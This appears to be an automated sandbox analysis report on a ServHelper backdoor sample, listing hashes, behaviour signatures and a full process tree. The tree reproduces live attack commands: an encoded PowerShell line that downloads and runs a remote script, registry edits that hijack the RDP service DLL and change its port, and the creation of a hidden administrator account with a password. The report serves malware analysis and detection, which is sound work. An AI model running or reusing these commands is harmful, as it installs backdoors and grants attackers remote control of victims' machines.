Analysis
-
max time kernel
131s -
max time network
119s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
20-07-2021 09:16
Static task
static1
Behavioral task
behavioral1
Sample
exe1.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
exe1.bin.exe
Resource
win10v20210410
General
-
Target
exe1.bin.exe
-
Size
4.6MB
-
MD5
eaee663dfeb2efcd9ec669f5622858e2
-
SHA1
2b96f0d568128240d0c53b2a191467fde440fd93
-
SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
-
SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 940 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1592 takeown.exe 1568 icacls.exe 620 icacls.exe 1680 icacls.exe 1964 icacls.exe 1100 icacls.exe 1712 icacls.exe 1780 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1844 1844 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1568 icacls.exe 620 icacls.exe 1680 icacls.exe 1964 icacls.exe 1100 icacls.exe 1712 icacls.exe 1780 icacls.exe 1592 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1323314d-f38f-43cf-8826-e6eae8d79402 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3e54fc2-be7b-4c5b-aa43-a5a343edd931 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b8634b9e-62cb-41f8-bbe4-da7bf5436d03 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXZB1YYNPNPQRGX58D3K.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_281ac449-6d71-4b99-8b80-5addd3c2b549 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_872c52d3-c0cf-4501-adbe-a5e004ef4efb powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea514b11-8fd8-47b7-88ad-1aabf028c967 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5505034d-bee8-49a7-bc94-eb5e1f4ffb6b powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5b04d74-21e7-426a-8ef5-5414996dfe1b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_179593a8-6966-470f-8620-c781a3dbbe65 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a1938cdf-02b0-497b-bd02-20aadc0e0bdd powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03e55983-7a1e-4a20-a1be-3b1870f1f0c6 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b034bf6c587dd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 568 powershell.exe 568 powershell.exe 1372 powershell.exe 1372 powershell.exe 1068 powershell.exe 1068 powershell.exe 1164 powershell.exe 1164 powershell.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe 940 powershell.exe 940 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 460 1844 1844 1844 1844 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeRestorePrivilege 620 icacls.exe Token: SeAssignPrimaryTokenPrivilege 328 WMIC.exe Token: SeIncreaseQuotaPrivilege 328 WMIC.exe Token: SeAuditPrivilege 328 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 328 WMIC.exe Token: SeIncreaseQuotaPrivilege 328 WMIC.exe Token: SeAuditPrivilege 328 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 692 WMIC.exe Token: SeIncreaseQuotaPrivilege 692 WMIC.exe Token: SeAuditPrivilege 692 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 692 WMIC.exe Token: SeIncreaseQuotaPrivilege 692 WMIC.exe Token: SeAuditPrivilege 692 WMIC.exe Token: SeDebugPrivilege 940 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
exe1.bin.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1984 wrote to memory of 568 1984 exe1.bin.exe powershell.exe PID 1984 wrote to memory of 568 1984 exe1.bin.exe powershell.exe PID 1984 wrote to memory of 568 1984 exe1.bin.exe powershell.exe PID 568 wrote to memory of 1532 568 powershell.exe csc.exe PID 568 wrote to memory of 1532 568 powershell.exe csc.exe PID 568 wrote to memory of 1532 568 powershell.exe csc.exe PID 1532 wrote to memory of 1880 1532 csc.exe cvtres.exe PID 1532 wrote to memory of 1880 1532 csc.exe cvtres.exe PID 1532 wrote to memory of 1880 1532 csc.exe cvtres.exe PID 568 wrote to memory of 1372 568 powershell.exe powershell.exe PID 568 wrote to memory of 1372 568 powershell.exe powershell.exe PID 568 wrote to memory of 1372 568 powershell.exe powershell.exe PID 568 wrote to memory of 1068 568 powershell.exe powershell.exe PID 568 wrote to memory of 1068 568 powershell.exe powershell.exe PID 568 wrote to memory of 1068 568 powershell.exe powershell.exe PID 568 wrote to memory of 1164 568 powershell.exe powershell.exe PID 568 wrote to memory of 1164 568 powershell.exe powershell.exe PID 568 wrote to memory of 1164 568 powershell.exe powershell.exe PID 568 wrote to memory of 1592 568 powershell.exe takeown.exe PID 568 wrote to memory of 1592 568 powershell.exe takeown.exe PID 568 wrote to memory of 1592 568 powershell.exe takeown.exe PID 568 wrote to memory of 1568 568 powershell.exe icacls.exe PID 568 wrote to memory of 1568 568 powershell.exe icacls.exe PID 568 wrote to memory of 1568 568 powershell.exe icacls.exe PID 568 wrote to memory of 620 568 powershell.exe icacls.exe PID 568 wrote to memory of 620 568 powershell.exe icacls.exe PID 568 wrote to memory of 620 568 powershell.exe icacls.exe PID 568 wrote to memory of 1680 568 powershell.exe icacls.exe PID 568 wrote to memory of 1680 568 powershell.exe icacls.exe PID 568 wrote to memory of 1680 568 powershell.exe icacls.exe PID 568 wrote to memory of 1964 568 powershell.exe icacls.exe PID 568 wrote to memory of 1964 568 powershell.exe icacls.exe PID 568 wrote to memory of 1964 568 powershell.exe icacls.exe PID 568 wrote to memory of 1100 568 powershell.exe icacls.exe PID 568 wrote to memory of 1100 568 powershell.exe icacls.exe PID 568 wrote to memory of 1100 568 powershell.exe icacls.exe PID 568 wrote to memory of 1712 568 powershell.exe icacls.exe PID 568 wrote to memory of 1712 568 powershell.exe icacls.exe PID 568 wrote to memory of 1712 568 powershell.exe icacls.exe PID 568 wrote to memory of 1780 568 powershell.exe icacls.exe PID 568 wrote to memory of 1780 568 powershell.exe icacls.exe PID 568 wrote to memory of 1780 568 powershell.exe icacls.exe PID 568 wrote to memory of 940 568 powershell.exe reg.exe PID 568 wrote to memory of 940 568 powershell.exe reg.exe PID 568 wrote to memory of 940 568 powershell.exe reg.exe PID 568 wrote to memory of 892 568 powershell.exe reg.exe PID 568 wrote to memory of 892 568 powershell.exe reg.exe PID 568 wrote to memory of 892 568 powershell.exe reg.exe PID 568 wrote to memory of 1472 568 powershell.exe reg.exe PID 568 wrote to memory of 1472 568 powershell.exe reg.exe PID 568 wrote to memory of 1472 568 powershell.exe reg.exe PID 568 wrote to memory of 1256 568 powershell.exe net.exe PID 568 wrote to memory of 1256 568 powershell.exe net.exe PID 568 wrote to memory of 1256 568 powershell.exe net.exe PID 1256 wrote to memory of 1312 1256 net.exe net1.exe PID 1256 wrote to memory of 1312 1256 net.exe net1.exe PID 1256 wrote to memory of 1312 1256 net.exe net1.exe PID 568 wrote to memory of 1664 568 powershell.exe cmd.exe PID 568 wrote to memory of 1664 568 powershell.exe cmd.exe PID 568 wrote to memory of 1664 568 powershell.exe cmd.exe PID 1664 wrote to memory of 1392 1664 cmd.exe cmd.exe PID 1664 wrote to memory of 1392 1664 cmd.exe cmd.exe PID 1664 wrote to memory of 1392 1664 cmd.exe cmd.exe PID 1392 wrote to memory of 1896 1392 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES620D.tmp" "c:\Users\Admin\AppData\Local\Temp\4ollxdjq\CSCD430DA36425C492D97B3F7169A39AFC7.TMP"4⤵PID:1880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1592 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1568 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:620 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1680 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1964 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1100 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1712 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:940
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:892 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1472
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1312
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1520
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1608
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:844
-
C:\Windows\system32\net.exenet start TermService5⤵PID:748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1020
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1372
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1632
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:984
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:620
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 3wIPoLDq /add1⤵PID:1880
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 3wIPoLDq /add2⤵PID:1168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq /add3⤵PID:1100
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1684
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:328
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:1132
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:1096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1804
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1312
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1692
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 3wIPoLDq1⤵PID:1532
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 3wIPoLDq2⤵PID:1600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq3⤵PID:1964
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:292
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:328
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:900
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:692
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:868
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1656
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f75b123-4949-4b56-8c39-e151aafcbbbd
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4de183f2-8fd1-4dd9-8a1f-7a37a5677403
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_98339e7e-4519-421e-a67f-018a14782935
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba983134-4a5b-409a-b352-c80e0f0f7332
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cbdf60f4-d62b-47ae-95d0-49a08733d431
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd1881c1-3172-475a-91fd-bd5d74f197c9
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7386bbd-3382-41d3-bcf3-bc577bd6a777
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD513ae3d1b91f093a5999e0701e1e017e0
SHA16b357e3e27c09c2153460392efbac9076f2f2ef7
SHA256c85e996edc262b5472aa839a2887f796c5a155673b7a95a45a56c4c9ad398078
SHA5123e3b016dc6724db45fd9ea379426647cc4f730d581219498b5926dcd08dfd5f8167cf3d7123d03c0629610892bc1f773eba8a6d37def674fa2837a5dd5373faf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5a5c4680958b359e37af267fe756e9ff8
SHA183315fa34dd9d376a97a8971706c14000d52875e
SHA256abb6dc1cdbaabcc623402d0fbc23ff9633fa9c0c4a0769f76c05701f0f921734
SHA51215331887f13c6486880676ca6020fb86482747913dcb19dce43798f9fb7c64cf0453b5f85b50a89253f9594310836d66360607ecf21088add68741ad19dafc41
-
MD5
98cf504ea3f4bd519eefc9c1bc49d5f8
SHA15bdc66329a762fa4c81e3d5e5e82c2136e1d139a
SHA256c04bd3cfe59a27bd1e6adb95a1fa63a195fa1a4828c37e91f8c0f66471540cc8
SHA512d17156dc0788aec18e212d93836dcad1e9efa25db0d9acc9353efd78ce8d0c63cbe4d1901533d4c00ce7f737ae1d7b68eea3e180a17e6107d2dbbec83cdf9701
-
MD5
5b8a94dfda8c7e90f27aaf735f458be1
SHA105f42ee946d3e77e1e45b7ce81dc0489616eeeae
SHA256583bf5969033ec2e83d9ec8f36112b91def284c7dca749753f2b18e75872a1f3
SHA51250464838c3582eb3ef863aad40ab14b50447f50a68d1ae6ba20fc8853fcd7bf52f9bf19ae7b87dd187c96e081b9f8ea77b26457984d29315b608f0e9c21c83e4
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD578030f8214f9aee63258fef119445881
SHA1d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA2560d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
SHA512a4d852a5a5e20050dcb414cfd27e301b7005a8a100edc289326c6529edeee455f8e37bf9222619ee65cd0622590f9b2c79e6b3410438f23d498c03d572a80e0b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD578030f8214f9aee63258fef119445881
SHA1d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA2560d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
